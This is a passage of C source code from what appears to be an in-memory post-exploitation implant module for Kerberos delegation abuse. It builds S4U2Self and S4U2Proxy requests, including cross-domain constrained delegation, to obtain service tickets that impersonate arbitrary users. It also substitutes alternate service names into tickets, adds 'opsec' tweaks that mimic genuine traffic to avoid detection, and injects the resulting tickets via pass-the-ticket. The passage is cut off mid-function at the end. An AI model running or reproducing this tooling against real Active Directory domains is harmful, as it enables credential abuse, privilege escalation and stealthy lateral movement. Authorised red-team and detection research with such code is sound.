        s4u2proxyReq.req_body.etypes[0] = aes128_cts_hmac_sha1;
        s4u2proxyReq.req_body.etypes[1] = aes256_cts_hmac_sha1;
        s4u2proxyReq.req_body.etypes[2] = rc4_hmac;
    }

    s4u2proxyReq.req_body.additional_tickets_count = 1;
    s4u2proxyReq.req_body.additional_tickets = MemAlloc(s4u2proxyReq.req_body.additional_tickets_count * sizeof(Ticket));
    s4u2proxyReq.req_body.additional_tickets[0] = tgs.tickets[0];

    byte* cksum_Bytes = NULL;
    int cksum_Bytes_length = 0;

    if (opsec) {
        // remove renewableok and add canonicalize
        s4u2proxyReq.req_body.kdc_options = s4u2proxyReq.req_body.kdc_options ^ (s4u2proxyReq.req_body.kdc_options & RENEWABLEOK);
        s4u2proxyReq.req_body.kdc_options = s4u2proxyReq.req_body.kdc_options | CANONICALIZE;

        // 15 minutes in the future like genuine requests
        s4u2proxyReq.req_body.till = 900;

        // get hostname and hostname of SPN
        int size = MAX_COMPUTERNAME_LENGTH + 2;
        char* hostname = MemAlloc(size);
        if (!hostname) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        KERNEL32$GetComputerNameA(hostname, &size);

        char* targetHostName;
        if (partsCount > 1) {
            int substrIndex = my_strfind(parts[1], '.');
            if (substrIndex < 0)
                substrIndex = my_strlen(parts[1]) + 1;

            my_copybuf(&(targetHostName), parts[1], substrIndex);
            targetHostName[substrIndex] = 0;
            StrToUpper(targetHostName);
        }
        else {
            my_copybuf(&(targetHostName), hostname, my_strlen(hostname) + 1);
        }

        // create enc-authorization-data if target host is not the local machine
        if (my_strcmp(hostname, targetHostName)) {

            ADIfRelevant ifrelevant = { 0 };
            ifrelevant.ad_type = 1;
            ifrelevant.ADData_count = 2;
            ifrelevant.ADData = MemAlloc(2 * sizeof(void*));

            ADRestrictionEntry restrictions = { 0 };
            restrictions.ad_type = 141; // KERB_AUTH_DATA_TOKEN_RESTRICTIONS;
            restrictions.restriction_type = 0;
            restrictions.restriction_length = 40;
            restrictions.restriction = ADRestrictionEntry_buildTokenStruct(1, 8192);

            ADKerbLocal kerbLocal = { 0 };
            kerbLocal.ad_type = 142; // KERB_LOCAL
            kerbLocal.ad_data_length = 16;
            kerbLocal.ad_data = MemAlloc(16);
            ADVAPI32$SystemFunction036(kerbLocal.ad_data, 16);

            ifrelevant.ADData[0] = &restrictions;
            ifrelevant.ADData[1] = &kerbLocal;

            AsnElt authDataSeq = { 0 }, authDataSeqContext = { 0 };
            if (AsnADIfRelevantEncode(&ifrelevant, &authDataSeq)) return TRUE;
            if (Make3(ASN_SEQUENCE, &authDataSeq, 1, &authDataSeqContext)) return TRUE;

            byte* authorizationDataBytes = NULL;
            int authorizationDataBytesLegth = 0;
            if (AsnToBytesEncode(&authDataSeqContext, &authorizationDataBytesLegth, &authorizationDataBytes)) return TRUE;

            s4u2proxyReq.req_body.enc_authorization_data.etype = tgs.enc_part.ticket_info[0].key.key_type;

            byte* enc_authorization_data = NULL;
            int enc_authorization_data_length = 0;
            if (encrypt(authorizationDataBytes, authorizationDataBytesLegth, tgs.enc_part.ticket_info[0].key.key_value, tgs.enc_part.ticket_info[0].key.key_type, KRB_KEY_USAGE_TGS_REQ_ENC_AUTHOIRZATION_DATA,
                        &(s4u2proxyReq.req_body.enc_authorization_data.cipher), &(s4u2proxyReq.req_body.enc_authorization_data.cipher_size))) return TRUE;
        }

        // encode req_body for authenticator cksum
        AsnElt req_Body_ASN = { 0 }, req_Body_ASNSeq = { 0 }, req_Body_ASNSeqContext = { 0 };
        if (AsnKDCReqBodyEncode(&(s4u2proxyReq.req_body), &req_Body_ASN)) return TRUE;
        if (Make3(ASN_SEQUENCE, &req_Body_ASN, 1, &req_Body_ASNSeq)) return TRUE;
        if (MakeImplicit(ASN_CONTEXT, 4, &req_Body_ASNSeq, &req_Body_ASNSeqContext)) return TRUE;

        int req_Body_Bytes_length = ValueLength(&req_Body_ASNSeqContext);
        byte* req_Body_Bytes = MemAlloc(req_Body_Bytes_length);
        req_Body_Bytes_length = EncodeValue(&req_Body_ASNSeqContext, 0, req_Body_Bytes_length, req_Body_Bytes, 0);

        checksum(clientKey.key_value, clientKey.key_size, req_Body_Bytes, req_Body_Bytes_length, KERB_CHECKSUM_RSA_MD5, KRB_KEY_USAGE_KRB_NON_KERB_CKSUM_SALT, &cksum_Bytes, &cksum_Bytes_length);
    }

    // moved to end so we can have the checksum in the authenticator
    PA_DATA padata = { 0 };
    if (New_PA_DATA(domain, userName, ticket, clientKey, opsec, cksum_Bytes, cksum_Bytes_length, &padata)) return TRUE;

    s4u2proxyReq.pa_data_count = 2;
    s4u2proxyReq.pa_data = MemAlloc(s4u2proxyReq.pa_data_count * sizeof(PA_DATA));
    s4u2proxyReq.pa_data[0] = padata;

    PA_DATA pac_options = { 0 };
    if (New_PA_DATA_options(FALSE, FALSE, FALSE, TRUE, &pac_options)) return TRUE;
    s4u2proxyReq.pa_data[1] = pac_options;

    byte* reqBytes = NULL;
    int   reqBytesSize = 0;
    AsnElt s4u2proxyReqAsn = { 0 };
    if (ReqToAsnEncode(s4u2proxyReq, 12, &s4u2proxyReqAsn)) return TRUE;
    if (AsnToBytesEncode(&s4u2proxyReqAsn, &reqBytesSize, &reqBytes)) return TRUE;

    byte* response2 = NULL;
    int response2Size = 0;
    sendBytes(domainController, "88", reqBytes, reqBytesSize, &response2, &response2Size);
    if (response2Size == 0)
        return TRUE;

    // decode the supplied bytes to an AsnElt object --- FALSE == ignore trailing garbage
    AsnElt responseAsn = { 0 };
    if (BytesToAsnDecode(response2, response2Size, &responseAsn)) return TRUE;

    if (responseAsn.tagValue == KERB_TGS_REP) {
        PRINT_OUT("[+] S4U2proxy success!\n");

        TGS_REP rep2 = { 0 };
        if (AsnGetTGS_REP(&responseAsn, &rep2)) return TRUE;

        byte* outBytes2 = NULL;
        int  outBytes2Length = 0;
        if (decrypt(clientKey.key_value, clientKey.key_type, KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, rep2.enc_part.cipher, rep2.enc_part.cipher_size, &outBytes2, &outBytes2Length)) return TRUE;

        AsnElt ae2 = { 0 };
        if (BytesToAsnDecode(outBytes2, outBytes2Length, &ae2)) return TRUE;

        EncKDCRepPart encRepPart2 = { 0 };
        if (AsnGetEncKDCRepPart(&(ae2.sub[0]), &encRepPart2)) return TRUE;

        if (altService) {
            for (int ind = 0; ind < altsvcCount; ind++) {
                // now build the final KRB-CRED structure with one or more alternate snames
                KRB_CRED cred = { 0 };
                cred.pvno = 5;
                cred.msg_type = 22;

                // since we want an alternate sname, first substitute it into the ticket structure
                rep2.ticket.sname.name_string[0] = altSnames[ind];

                cred.ticket_count = 1;
                cred.tickets = MemAlloc(cred.ticket_count * sizeof(Ticket));
                if (!cred.tickets) {
                    PRINT_OUT("[x] Failed alloc memory");
                    return TRUE;
                }
                cred.tickets[0] = rep2.ticket;

                KrbCredInfo info = { 0 };

                info.key = encRepPart2.key;
                if (my_copybuf(&(info.key.key_value), encRepPart2.key.key_value, encRepPart2.key.key_size)) return TRUE;

                if (my_copybuf(&(info.prealm), encRepPart2.realm, my_strlen(encRepPart2.realm) + 1)) return TRUE;

                info.pname = rep2.cname;
                info.pname.name_string = MemAlloc(info.pname.name_count * sizeof(void*));
                for (int i = 0; i < info.pname.name_count; i++)
                    if (my_copybuf(&(info.pname.name_string[i]), rep2.cname.name_string[i], my_strlen(rep2.cname.name_string[i]) + 1)) return TRUE;

                info.flags = encRepPart2.flags;
                info.starttime = encRepPart2.starttime;
                info.endtime = encRepPart2.endtime;
                info.renew_till = encRepPart2.renew_till;

                if (my_copybuf(&(info.srealm), encRepPart2.realm, my_strlen(encRepPart2.realm) + 1)) return TRUE;

                info.sname = encRepPart2.sname;
                info.sname.name_string = MemAlloc(info.sname.name_count * sizeof(void*));
                for (int i = 0; i < info.sname.name_count; i++)
                    if (my_copybuf(&(info.sname.name_string[i]), encRepPart2.sname.name_string[i], my_strlen(encRepPart2.sname.name_string[i]) + 1)) return TRUE;

                // if we want an alternate sname, substitute it into the encrypted portion of the KRB_CRED
                PRINT_OUT("[*] Substituting alternative service name '%s'\n", altSnames[ind]);
                info.sname.name_string[0] = altSnames[ind];

                cred.enc_part.ticket_count = 1;
                cred.enc_part.ticket_info = MemAlloc(cred.enc_part.ticket_count * sizeof(KrbCredInfo));
                if (!cred.enc_part.ticket_info) {
                    PRINT_OUT("[x] Failed alloc memory");
                    return TRUE;
                }
                cred.enc_part.ticket_info[0] = info;

                AsnElt asnCred = { 0 };
                if (AsnKrbCredEncode(&cred, &asnCred)) return TRUE;

                byte* kirbiBytes = NULL;
                int   kirbiBytesSize = 0;
                if (AsnToBytesEncode(&asnCred, &kirbiBytesSize, &kirbiBytes)) return TRUE;

                char* kirbiString = base64_encode(kirbiBytes, kirbiBytesSize);

                PRINT_OUT("[*] base64(ticket.kirbi) for SPN '%s/%s':\n\n", altSnames[ind], serverName);
                PRINT_OUT("%s\n\n", kirbiString);

                if (ptt)
                    PTT(NULL, kirbiString);
            }
        }
        else {
            // now build the final KRB-CRED structure, no alternate snames
            KRB_CRED cred = { 0 };
            cred.pvno = 5;
            cred.msg_type = 22;
            cred.ticket_count = 1;
            cred.tickets = MemAlloc(cred.ticket_count * sizeof(Ticket));
            if (!cred.tickets) {
                PRINT_OUT("[x] Failed alloc memory");
                return TRUE;
            }
            cred.tickets[0] = rep2.ticket;

            KrbCredInfo info = { 0 };

            info.key = encRepPart2.key;
            if (my_copybuf(&(info.key.key_value), encRepPart2.key.key_value, encRepPart2.key.key_size)) return TRUE;

            if (my_copybuf(&(info.prealm), encRepPart2.realm, my_strlen(encRepPart2.realm) + 1)) return TRUE;

            info.pname = rep2.cname;
            info.pname.name_string = MemAlloc(info.pname.name_count * sizeof(void*));
            for (int i = 0; i < info.pname.name_count; i++)
                if (my_copybuf(&(info.pname.name_string[i]), rep2.cname.name_string[i], my_strlen(rep2.cname.name_string[i]) + 1)) return TRUE;

            info.flags = encRepPart2.flags;
            info.starttime = encRepPart2.starttime;
            info.endtime = encRepPart2.endtime;
            info.renew_till = encRepPart2.renew_till;

            if (my_copybuf(&(info.srealm), encRepPart2.realm, my_strlen(encRepPart2.realm) + 1)) return TRUE;

            info.sname = encRepPart2.sname;
            info.sname.name_string = MemAlloc(info.sname.name_count * sizeof(void*));
            for (int i = 0; i < info.sname.name_count; i++)
                if (my_copybuf(&(info.sname.name_string[i]), encRepPart2.sname.name_string[i], my_strlen(encRepPart2.sname.name_string[i]) + 1)) return TRUE;

            cred.enc_part.ticket_count = 1;
            cred.enc_part.ticket_info = MemAlloc(cred.enc_part.ticket_count * sizeof(KrbCredInfo));
            if (!cred.enc_part.ticket_info) {
                PRINT_OUT("[x] Failed alloc memory");
                return TRUE;
            }
            cred.enc_part.ticket_info[0] = info;

            AsnElt asnCred = { 0 };
            if (AsnKrbCredEncode(&cred, &asnCred)) return TRUE;

            byte* kirbiBytes = NULL;
            int   kirbiBytesSize = 0;
            if (AsnToBytesEncode(&asnCred, &kirbiBytesSize, &kirbiBytes)) return TRUE;

            char* kirbiString = base64_encode(kirbiBytes, kirbiBytesSize);

            PRINT_OUT("[*] base64(ticket.kirbi) for SPN '%s':\n\n", targetSPN);
            PRINT_OUT("%s\n\n", kirbiString);

            if (ptt)
                PTT(NULL, kirbiString);
        }
        return FALSE;
    }
    else if (responseAsn.tagValue == KERB_ERROR) {
        uint error_code = 0;
        if (AsnGetErrorCode(&(responseAsn.sub[0]), &error_code)) return TRUE;
        PRINT_OUT("\n\t[x] Kerberos error : %d\n", error_code);
    }
    else {
        PRINT_OUT("\n[X] Unknown application tag: %d\n", responseAsn.tagValue);
    }

    return TRUE;
}

BOOL CrossDomainS4U2Self(char* userName, char* user, char* domain, char* targetUser, char* targetDomain, char* targetDomainController, Ticket ticket, EncryptionKey clientKey, int requestEType, BOOL cross, char* altService, BOOL self, BOOL ptt, char* requestDomain, KRB_CRED* retKrbCred) {
    PRINT_OUT("[*] Requesting the cross realm 'S4U2Self' for %s from %s\n", targetUser, targetDomainController);

    byte* tgsBytes = NULL;
    int	  tgsBytesLength = 0;
    if (NewTGS_target_REQ(userName, user, domain, targetUser, targetDomain, ticket, clientKey, requestEType, cross, requestDomain, &tgsBytes, &tgsBytesLength)) return TRUE;

    PRINT_OUT("[*] Sending cross realm S4U2Self request\n");
    byte* response = NULL;
    int   responseSize = 0;
    sendBytes(targetDomainController, "88", tgsBytes, tgsBytesLength, &response, &responseSize);
    if (responseSize == 0)
        return TRUE;

    // decode the supplied bytes to an AsnElt object
    AsnElt responseAsn = { 0 };
    if (BytesToAsnDecode3(response, responseSize, FALSE, &responseAsn)) return TRUE;
    if (responseAsn.tagValue == KERB_TGS_REP) {
        PRINT_OUT("[+] cross realm S4U2Self success!\n");

        TGS_REP rep = { 0 };
        if (NewTGS_REP(responseAsn, &rep)) return TRUE;

        byte* outBytes = NULL;
        int  outBytesLength = 0;
        if (decrypt(clientKey.key_value, clientKey.key_type, KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, rep.enc_part.cipher, rep.enc_part.cipher_size, &outBytes, &outBytesLength)) return TRUE;

        AsnElt ae = { 0 };
        if (BytesToAsnDecode3(outBytes, outBytesLength, FALSE, &ae)) return TRUE;

        EncKDCRepPart encRepPart = { 0 };
        if (AsnGetEncKDCRepPart(&(ae.sub[0]), &encRepPart)) return TRUE;

        // build the final KRB-CRED structure
        KRB_CRED cred = { 0 };
        cred.pvno = 5;
        cred.msg_type = 22;
        cred.ticket_count = 1;
        cred.tickets = MemAlloc(cred.ticket_count * sizeof(Ticket));
        if (!cred.tickets) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        cred.tickets[0] = rep.ticket;

        // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
        KrbCredInfo info = { 0 };

        info.key = encRepPart.key;
        if (my_copybuf(&(info.key.key_value), encRepPart.key.key_value, encRepPart.key.key_size)) return TRUE;

        if (my_copybuf(&(info.prealm), rep.crealm, my_strlen(rep.crealm) + 1)) return TRUE;

        info.pname = rep.cname;
        info.pname.name_string = MemAlloc(info.pname.name_count * sizeof(void*));
        for (int i = 0; i < info.pname.name_count; i++)
            if (my_copybuf(&(info.pname.name_string[i]), rep.cname.name_string[i], my_strlen(rep.cname.name_string[i]) + 1)) return TRUE;

        info.flags = encRepPart.flags;
        info.starttime = encRepPart.starttime;
        info.endtime = encRepPart.endtime;
        info.renew_till = encRepPart.renew_till;

        if (my_copybuf(&(info.srealm), rep.crealm, my_strlen(rep.crealm) + 1)) return TRUE;

        info.sname = encRepPart.sname;
        info.sname.name_string = MemAlloc(info.sname.name_count * sizeof(void*));
        for (int i = 0; i < info.sname.name_count; i++)
            if (my_copybuf(&(info.sname.name_string[i]), encRepPart.sname.name_string[i], my_strlen(encRepPart.sname.name_string[i]) + 1)) return TRUE;

        cred.enc_part.ticket_count = 1;
        cred.enc_part.ticket_info = MemAlloc(cred.enc_part.ticket_count * sizeof(KrbCredInfo));
        if (!cred.enc_part.ticket_info) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        cred.enc_part.ticket_info[0] = info;

        AsnElt asnCred = { 0 };
        if (AsnKrbCredEncode(&cred, &asnCred)) return TRUE;

        byte* kirbiBytes = NULL;
        int   kirbiBytesSize = 0;
        if (AsnToBytesEncode(&asnCred, &kirbiBytesSize, &kirbiBytes)) return TRUE;

        char* ticket = base64_encode(kirbiBytes, kirbiBytesSize);

        PRINT_OUT("[*] base64(ticket.kirbi):\n\n    %s\n\n", ticket);
        DescribeTicket(ticket);
        PRINT_OUT("\n");
        if (ptt)
            PTT(NULL, ticket);


        AsnElt asn_KRB_CRED = { 0 };
        if (BytesToAsnDecode3(kirbiBytes, kirbiBytesSize, FALSE, &asn_KRB_CRED)) return TRUE;
        if (AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), retKrbCred)) return TRUE;
        return FALSE;
    }
    else if (responseAsn.tagValue == KERB_ERROR) {
        uint error_code = 0;
        if (AsnGetErrorCode(&(responseAsn.sub[0]), &error_code)) return TRUE;
        PRINT_OUT("\n\t[x] Kerberos error : %d\n", error_code);
    }
    else {
        PRINT_OUT("\n[X] Unknown application tag: %d\n", responseAsn.tagValue);
    }
    return TRUE;
}

BOOL CrossDomainS4U2Proxy(char* userName, char* user, char* domain, char* targetDomain, char* targetSPN, char* targetDomainController, Ticket ticket, EncryptionKey clientKey, int requestEType, Ticket tgs, BOOL cross, BOOL ptt, KRB_CRED* retKrbCred) {
    PRINT_OUT("[*] Building S4U2proxy request for service: '%s' on %s\n", targetSPN, targetDomainController);

    AS_REQ s4u2proxyReq = { 0 };

    s4u2proxyReq.pvno = 5;
    s4u2proxyReq.msg_type = 12;

    s4u2proxyReq.req_body.kdc_options = FORWARDABLE | RENEWABLE | RENEWABLEOK;
    s4u2proxyReq.req_body.till = 24 * 3600;		     // valid for 1h
    ADVAPI32$SystemFunction036(&(s4u2proxyReq.req_body.nonce), 4);

    // create the PA-DATA that contains the AP-REQ w/ appropriate authenticator/etc.
    PA_DATA padata = { 0 };
    if (New_PA_DATA(domain, user, ticket, clientKey, FALSE, NULL, 0, &padata)) return TRUE;

    PA_DATA pac_options = { 0 };
    if (New_PA_DATA_options(FALSE, FALSE, FALSE, TRUE, &pac_options)) return TRUE;

    s4u2proxyReq.pa_data_count = 2;
    s4u2proxyReq.pa_data = MemAlloc(s4u2proxyReq.pa_data_count * sizeof(PA_DATA));
    s4u2proxyReq.pa_data[0] = padata;
    s4u2proxyReq.pa_data[1] = pac_options;

    s4u2proxyReq.req_body.kdc_options = s4u2proxyReq.req_body.kdc_options | CONSTRAINED_DELEGATION | CANONICALIZE;
    s4u2proxyReq.req_body.kdc_options = s4u2proxyReq.req_body.kdc_options ^ (s4u2proxyReq.req_body.kdc_options & RENEWABLEOK);

    // which domain is the "local" domain for this TGS
    if (cross) {
      if (my_copybuf(&(s4u2proxyReq.req_body.realm), targetDomain, my_strlen(targetDomain) + 1)) return TRUE;
    }
    else {
      if (my_copybuf(&(s4u2proxyReq.req_body.realm), domain, my_strlen(domain) + 1)) return TRUE;
    }

    char* spns = NULL;
    if (my_copybuf(&spns, targetSPN, my_strlen(targetSPN) + 1)) return TRUE;

    int partsCount = 0;
    char** parts = my_strsplit( spns, '/', &partsCount );

    s4u2proxyReq.req_body.sname.name_type = PRINCIPAL_NT_SRV_INST;
    s4u2proxyReq.req_body.sname.name_count = partsCount;
    s4u2proxyReq.req_body.sname.name_string = MemAlloc(s4u2proxyReq.req_body.sname.name_count * sizeof(void*));
    for (int i = 0; i < partsCount; i++)
      my_copybuf(&(s4u2proxyReq.req_body.sname.name_string[i]), parts[i], my_strlen(parts[i]) + 1);

    s4u2proxyReq.req_body.etypes_count = 3;
    s4u2proxyReq.req_body.etypes = MemAlloc(sizeof(int) * s4u2proxyReq.req_body.etypes_count);
    s4u2proxyReq.req_body.etypes[0] = aes128_cts_hmac_sha1;
    s4u2proxyReq.req_body.etypes[1] = aes256_cts_hmac_sha1;
    s4u2proxyReq.req_body.etypes[2] = rc4_hmac;

    s4u2proxyReq.req_body.additional_tickets_count = 1;
    s4u2proxyReq.req_body.additional_tickets = MemAlloc(s4u2proxyReq.req_body.additional_tickets_count * sizeof(Ticket));
    s4u2proxyReq.req_body.additional_tickets[0] = tgs;

    byte* s4ubytes = NULL;
    int s4ubytesSize = 0;
    AsnElt s4u2proxyReqAsn = { 0 };
    if (ReqToAsnEncode(s4u2proxyReq, 12, &s4u2proxyReqAsn)) return TRUE;
    if (AsnToBytesEncode(&s4u2proxyReqAsn, &s4ubytesSize, &s4ubytes)) return TRUE;

    PRINT_OUT("[*] Sending S4U2proxy request\n");

    byte* response = NULL;
    int   responseSize = 0;
    sendBytes(targetDomainController, "88", s4ubytes, s4ubytesSize, &response, &responseSize);
    if (responseSize == 0)
      return TRUE;

    // decode the supplied bytes to an AsnElt object
    AsnElt responseAsn = { 0 };
    if (BytesToAsnDecode3(response, responseSize, FALSE, &responseAsn)) return TRUE;
    if (responseAsn.tagValue == KERB_TGS_REP) {

      PRINT_OUT("[+] S4U2proxy success!\n");

      TGS_REP rep = { 0 };
      if (NewTGS_REP(responseAsn, &rep)) return TRUE;

      byte* outBytes = NULL;
      int  outBytesLength = 0;
      if (decrypt(clientKey.key_value, clientKey.key_type, KRB_KEY_USAGE_TGS_REP_EP_SESSION_KEY, rep.enc_part.cipher, rep.enc_part.cipher_size, &outBytes, &outBytesLength)) return TRUE;

      AsnElt ae = { 0 };
      if (BytesToAsnDecode3(outBytes, outBytesLength, FALSE, &ae)) return TRUE;

      EncKDCRepPart encRepPart = { 0 };
      if (AsnGetEncKDCRepPart(&(ae.sub[0]), &encRepPart)) return TRUE;

      KRB_CRED cred = { 0 };
      cred.pvno = 5;
      cred.msg_type = 22;

      cred.ticket_count = 1;
      cred.tickets = MemAlloc(cred.ticket_count * sizeof(Ticket));
      if (!cred.tickets) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
      }
      cred.tickets[0] = rep.ticket;

      // build the EncKrbCredPart/KrbCredInfo parts from the ticket and the data in the encRepPart
      KrbCredInfo info = { 0 };

      info.key = encRepPart.key;
      if (my_copybuf(&(info.key.key_value), encRepPart.key.key_value, encRepPart.key.key_size)) return TRUE;

      if (my_copybuf(&(info.prealm), encRepPart.realm, my_strlen(encRepPart.realm) + 1)) return TRUE;

      info.pname = rep.cname;
      info.pname.name_string = MemAlloc(info.pname.name_count * sizeof(void*));
      for (int i = 0; i < info.pname.name_count; i++)
        if (my_copybuf(&(info.pname.name_string[i]), rep.cname.name_string[i], my_strlen(rep.cname.name_string[i]) + 1)) return TRUE;

      info.flags = encRepPart.flags;
      info.starttime = encRepPart.starttime;
      info.endtime = encRepPart.endtime;
      info.renew_till = encRepPart.renew_till;

      if (my_copybuf(&(info.srealm), encRepPart.realm, my_strlen(encRepPart.realm) + 1)) return TRUE;

      info.sname = encRepPart.sname;
      info.sname.name_string = MemAlloc(info.sname.name_count * sizeof(void*));
      for (int i = 0; i < info.sname.name_count; i++)
        if (my_copybuf(&(info.sname.name_string[i]), encRepPart.sname.name_string[i], my_strlen(encRepPart.sname.name_string[i]) + 1)) return TRUE;

      cred.enc_part.ticket_count = 1;
      cred.enc_part.ticket_info = MemAlloc(cred.enc_part.ticket_count * sizeof(KrbCredInfo));
      if (!cred.enc_part.ticket_info) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
      }
      cred.enc_part.ticket_info[0] = info;

      AsnElt asnCred = { 0 };
      if (AsnKrbCredEncode(&cred, &asnCred)) return TRUE;

      byte* kirbiBytes = NULL;
      int   kirbiBytesSize = 0;
      if (AsnToBytesEncode(&asnCred, &kirbiBytesSize, &kirbiBytes)) return TRUE;

      char* ticket = base64_encode(kirbiBytes, kirbiBytesSize);

      PRINT_OUT("[*] base64(ticket.kirbi) for SPN '%s':\n\n    %s\n\n", targetSPN, ticket);

      if (ptt && cross)
        PTT(NULL, ticket);


      AsnElt asn_KRB_CRED = { 0 };
      if (BytesToAsnDecode3(kirbiBytes, kirbiBytesSize, FALSE, &asn_KRB_CRED)) return TRUE;
      if (AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), retKrbCred)) return TRUE;
    }
    else if (responseAsn.tagValue == KERB_ERROR) {
      uint error_code = 0;
      if (AsnGetErrorCode(&(responseAsn.sub[0]), &error_code)) return TRUE;
      PRINT_OUT("\n\t[x] Kerberos error : %d\n", error_code);
      //        PRINT_OUT("\n\t[x] Kerberos error : %s\n", lookupKrbErrorCode(error_code));
    }
    else {
      PRINT_OUT("\n[X] Unknown application tag: %d\n", responseAsn.tagValue);
    }
    return TRUE;
    }

    void CrossDomainS4U(KRB_CRED kirbi, char* targetUser, char* targetSPN, char* domainController, char* altService, char* targetDomainController, char* targetDomain, BOOL ptt) {
      // extract out the info needed for the TGS-REQ/S4U2Self execution
      char* userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
      char* domain = kirbi.enc_part.ticket_info[0].prealm;
      Ticket ticket = kirbi.tickets[0];
      EncryptionKey clientKey = kirbi.enc_part.ticket_info[0].key;

      char* user = MemAlloc(my_strlen(userName) + my_strlen(domain) + 2);
      MemCpy(user, userName, my_strlen(userName));
      user[my_strlen(userName)] = '@';
      MemCpy(user + my_strlen(userName) + 1, domain, my_strlen(domain));

      char* target = MemAlloc(my_strlen(targetUser) + my_strlen(targetDomain) + 2);
      MemCpy(target, targetUser, my_strlen(targetUser));
      target[my_strlen(targetUser)] = '@';
      MemCpy(target + my_strlen(targetUser) + 1, targetDomain, my_strlen(targetDomain));

      char* targetService = MemAlloc(8 + my_strlen(targetDomain));
      MemCpy(targetService, "krbtgt/", 7);
      MemCpy(targetService + 7, targetDomain, my_strlen(targetDomain));

      //First retrieve our service ticket for the target domains KRBTGT from our DC
      PRINT_OUT("[*] Retrieving referral TGT from %s for foreign domain, %s, KRBTGT service\n", domain, targetDomain);

      byte* crossBytes = NULL;
      int crossBytesLength = 0;
      if (TGS(userName, domain, ticket, clientKey, targetService, subkey_keymaterial, domainController, NULL, FALSE, FALSE, FALSE, NULL, NULL, FALSE, FALSE, &crossBytes, &crossBytesLength)) return;

      KRB_CRED crossTGS = { 0 };
      AsnElt   asn_KRB_CRED = { 0 };
      if (BytesToAsnDecode3(crossBytes, crossBytesLength, FALSE, &asn_KRB_CRED)) return;
      if (AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &crossTGS)) return;
      EncryptionKey crossKey = crossTGS.enc_part.ticket_info[0].key;

      PRINT_OUT("[*] Retrieving the S4U2Self referral from %s\n", targetDomain);
      KRB_CRED foreignSelf = { 0 };
      if (CrossDomainS4U2Self(user, userName, domain, target, targetDomain, targetDomainController, crossTGS.tickets[0], crossKey, subkey_keymaterial, TRUE, NULL, FALSE, FALSE, NULL, &foreignSelf)) return;
      crossKey = foreignSelf.enc_part.ticket_info[0].key;

      PRINT_OUT("[*] Requesting the S4U2Self ticket from %s\n", domain);
      KRB_CRED localSelf = { 0 };
      if (CrossDomainS4U2Self(user, userName, domain, target, targetDomain, domainController, foreignSelf.tickets[0], crossKey, subkey_keymaterial, FALSE, NULL, FALSE, FALSE, NULL, &localSelf)) return;

      if (targetSPN) {
        // Using our standard TGT and attaching our local S4U2Self
        KRB_CRED localS4U2Proxy = { 0 };
        if (CrossDomainS4U2Proxy(user, userName, domain, targetDomain, targetSPN, domainController, ticket, clientKey, subkey_keymaterial, localSelf.tickets[0], FALSE, FALSE, &localS4U2Proxy)) return;
        crossKey = crossTGS.enc_part.ticket_info[0].key;

        KRB_CRED foreignS4U2Proxy = { 0 };
        CrossDomainS4U2Proxy(user, userName, domain, target, targetSPN, targetDomainController, crossTGS.tickets[0], crossKey, subkey_keymaterial, localS4U2Proxy.tickets[0], TRUE, ptt, &foreignS4U2Proxy);
      }
    }

    void S4UExecute_Ticket(byte* ticket, char* targetUser, char* targetSPN, char* domainController, char* altService, KRB_CRED tgs, BOOL s, BOOL opsec, BOOL ptt, int encType, char* targetDomainController, char* targetDomain, char* requestDomain) { /*BOOL ptt = FALSE, string keyString = "", string impersonateDomain = "" */
      int bytesSize = 0;
      byte* bytes = base64_decode(ticket, &bytesSize);

      KRB_CRED kirbi = { 0 };
      AsnElt   asn_KRB_CRED = { 0 };
      if (BytesToAsnDecode3(bytes, bytesSize, FALSE, &asn_KRB_CRED)) return;
      if (AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &kirbi)) return;

      if ( targetDomainController ) {
        // do cross domain S4U --- no support for supplying a TGS due to requiring more than a single ticket
        PRINT_OUT("[*] Performing cross domain constrained delegation\n");
        CrossDomainS4U(kirbi, targetUser, targetSPN, domainController, altService, targetDomainController, targetDomain, ptt);
      }
    else {
        if (tgs.enc_part.ticket_count && targetSPN) {
          PRINT_OUT("[*] Loaded a TGS for %s\\%s\n", tgs.enc_part.ticket_info[0].prealm, tgs.enc_part.ticket_info[0].pname.name_string[0]);
          S4U2Proxy(kirbi, targetUser, targetSPN, domainController, altService, tgs, opsec, ptt);
        }
        else {
          KRB_CRED self = { 0 };
          char* userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
          char* domain = targetDomain;
          targetDomain = kirbi.enc_part.ticket_info[0].prealm;
          Ticket ticket = kirbi.tickets[0];
          EncryptionKey clientKey = kirbi.enc_part.ticket_info[0].key;

          if (requestDomain == NULL)
            requestDomain = targetDomain;

          char* user = MemAlloc(my_strlen(userName) + my_strlen(domain) + 2);
          MemCpy(user, userName, my_strlen(userName));
          user[my_strlen(userName)] = '@';
          MemCpy(user + my_strlen(userName) + 1, domain, my_strlen(domain));

          char* target = MemAlloc(my_strlen(targetUser) + my_strlen(targetDomain) + 2);
          MemCpy(target, targetUser, my_strlen(targetUser));
          target[my_strlen(targetUser)] = '@';
          MemCpy(target + my_strlen(targetUser) + 1, targetDomain, my_strlen(targetDomain));

          if (CrossDomainS4U2Self(user, userName, domain, target, targetDomain, domainController, ticket, clientKey, subkey_keymaterial, FALSE, altService, s, ptt, requestDomain, &self)) return;

          if (targetSPN)
            S4U2Proxy(kirbi, targetUser, targetSPN, domainController, altService, self, opsec, ptt);
        }
      }
    }

    void ASK_S4U_RUN( PCHAR Buffer, DWORD Length ) {
      PRINT_OUT("[*] Action: S4U\n\n");

      char* domain       = NULL;
      char* dc           = NULL;
      int   encType      = subkey_keymaterial;
      BOOL  ptt          = FALSE;
      BOOL  opsec        = FALSE;
      BOOL  pac          = TRUE;
      BOOL  self         = FALSE;
      char* targetSPN    = NULL;
      byte* ticket       = NULL;
      byte* tgs          = NULL;
      char* targetDomain = NULL;
      char* targetdc     = NULL;
